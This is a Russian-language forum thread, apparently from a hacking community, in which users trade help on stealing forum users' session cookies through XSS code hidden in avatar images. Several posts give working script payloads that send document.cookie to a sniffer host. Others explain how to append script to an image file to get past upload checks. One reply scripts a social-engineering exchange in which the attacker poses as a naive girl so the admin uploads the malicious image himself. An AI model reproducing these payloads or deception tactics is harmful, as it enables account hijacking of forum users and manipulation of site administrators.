\А как по твоему ява срабатывает? Да и написано ведь куда кликать надо. Аватара ни причём. Не знаю, у меня работает...
Если он определяет тип картинки по расширению, то че говорит, что не тот тип когда внутри в ней хтмл код?
=) Бывает. Но что именно забавно - вот такое первое невнимательное чтение статей (любых) иногда приводит к интересным идеям. Да это я понял, я просто допетрить никак не могу откуда ты это взял из статьи. Просто тут смотри чего выходит: я постю тему и в ней прошу посмотреть на мою аватарку. Нафиг кто будет заходить по ссылке смотреть аватар, если он у меня на форуме уже виден? Плюс некоторые форумы если ссылка на изображении - могут это изображение сразу вставить. А так - народу требуется прогуляться и заценить что либо: сайт, изображение или еще чего. Кто бы сомневался. Да я и не стремлюсь никого обгонять или догонять. Мне и так комфортно.
мммммммммммммммм Скажите пожалуйста.Вот допустим это адрес снифера :http://antichat.org/s/tyui.gif Тогда правильно ли я сделал аватар? <body onloаd="javаscript:document.locatiоn.replаce('http://www.мой сайт.narod.ru/index.htm')"> <script language="JavаScript"> img = nеw Imаge(); img.srс = "http://antichat.org/s/tyui.gif/?"+document.cookie; </script> И как можно проверить это? Если допустим я открою такой аватар в IE то должен ли я попасть в лог снифера?
Если ты откроешь этот аватар в ИЕ, то сначала куки уйдут на снифер, а потом ты будешь перенаправлен на сайт http://www.мой сайт.narod.ru/index.htm Что такое снифер? (в понимании для использования XSS) Это просто скрипт, который все что ему передали - записывает в лог. Передашь число - он число запишет: http://antichat.org/s/abcd.gif/?123, передашь куки - запишет куки. А ты уже потом сам зайдешь в лог снифера и глянешь - есть там что или нет.
Я открываю его в Ie. но мне открывается просто страница с крестиком.... Иду смотреть лог снифера,там пусто...
После того как загоняю аватарку на форум получаю такой урл http://www.пупкин.com/forums/image....lаintext><plaintext> Вроде всё правильно…?
А тебе надо именно с редиректом на другую страницу? Может тебе проще? Лезешь на babiex.com, выбираешь откровенную фотку. В Фотошопе ее немного уменьшаешь и кадрируешь. Вообщем - делаешь нормальную аватарку. Дальше делаешь по принципу как тут: http://forum.xakep.ru/avatars/avatar15.gif Только вместо кода с alert впихиваешь img = nеw Imаge(); img.srс = "http://адрес_до_снифера.ru/snif.php?"+document.cookie; После чего отписываешь админу: "а на вашем форуме возможно в качестве аватарки использовать такое изображение? или тут есть цензура? если есть - то я тогда сменю. хотя мне бы и не хотелось, так как привык. спасибо." и даешь ссылку на аватарку. Редиректа не происходит? Думай. Не в обиду, но в коде "защита от дурака". Но самая-самая примитивная. Она даже не от дурака, а от ленивого.... Я же пошагово все расписал и весь код привел.
Да чего мне обижаться то... Я в этом деле полный чайник.Поэтому делаю всё по шаблону в твоей статье.Мне нужны куки с пользоателей одного форума. Я про эту защиту от дурака уже сутки думаю Ну не догоняю я..... Я сделал всё так как в статье. Сделал реальную страницу и подставную... Башка уже трещит....
=) там все очень и очень просто... подсказку дал - от ленивых. вот ленивый читает статью и хочет повторить что там написано. как и что он будет делать? ну вот и сделай по другому. по-моему уже все подсказал
Ребята у меня тоже не получается =( Пожалуйста помогите. Только большая прозьба не злитесь на меня. Ok? вот скрипт: Code: <body onloаd="javаscript:document.locatiоn.replаce('http://сайт.ru')"> <script language="JavаScript"> img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; </script> Вроде правильно... Но не хочет отправлять на снифер данные... А обязательно ставить ";" после document.cookie ?
Прописать то можно все что хочешь, но работать не будет. Точнее - на снифер просто придет текст "login&paswword", а не настоящие login&paswword Если было бы так легко - то зачем тогда народ заморачивается с куками? =) Хотя ты и можешь попробовать получить значения некоторых полей, либо вообще себе на снифер послать любую страницу (от имени пользователя) Если наобум, то надо "подделывать" его Форум. Способов и реализайия есть несколько. Будет время - я распишу по-шагово как это сделать на основе бага в изображениях. Или сам допетри - там не сложно! Также внимательно прочитай тут: http://www.forum.antichat.ru/thread11236.html Идеи никакие не появились? =)
Там защита. Уже намекал как обходится: не ленимся! (ну и в настройках браузера проверь - не отключена ли у тебя переадресация) Ну если не получается залить, значит не получается залить. Потому что форум при заливке проверяет что ему заливают в качестве аватарки. Попробуй открыть любое изображение блокнотом, отмотай вниз и в самом конце поставить <script>alert()</script> Теперь пробуй залить. Опять не пущает? Попробуй изображение прилепить в тему. Смотри там при создании сообщения кнопку Обзор. Если не нашел, то пробуй так ссылку на изображение вставить. Вообщем пробуй не через кнопку Обзор, а через указания пути до изображения. Некоторые Форумы сами за тебя к себе закачают. Конечно скажу. Изображение открывается на другом хостинге, и именно его куки ты пытаешься отправить на снифер. А так как их нету - то только рефферер и приходит. ... "Баг" в изображении тока под ИЕ Дык под 1.3 есть сплойт ворующий хэш Или попробуй применить Си (но время потребуется): 1 - Зарегь сайт на Народ_Ру. 2 - Положи туда свое изображение: открыл изображение, отмотал, вставил код 3 - Лезь в настройки аватарки и укажи полную ссылку на него Народ_ру примечательный тем, что он не дает хостящие на нем изображения публиковать в других местах. Т.е. у тебя вместо аватарки будет отсутсвующий рисунок (с красным крестом). 4 - Теперь пиши Админу от имени голубоглазой девочки Маруси из деревни Нижние Васюки: извините, а можно Вам вопрос как сисадмину задать? Он: угук. я такой. тока круче! чё нада? Ты: Почему у всех на Форуме возле имени стоит рисунок, а у меня рисунок красным крестиком? Я сделала все так, как мне написали: мне прислали адрес рисунка которого я хотела, и я его вставила в поле URL... Но там на рисунке был бигимотик, а получается что крестик... Он наверняка сначала отпишет: грузи ее через кнопку Обзор. Ты (культурно): а не будете столь любезны подсказать, как ее загрузить? Он: сохрани изображение на комп, и потом загрузи. Ты: а как ее можно сохранить? Он: правой кнопкой, потом в настройки профиля, кнопка обзор... Ты: все. сохранила у себя. в папку Мои рисунки, но рядом с именем все-равно крестик. что я делаю не так? Если он не повеситься и не снесет нахрен этот Форум, он сам тебе скачает это изображение, выложит на сервак и тебе его пропишет в профиле.
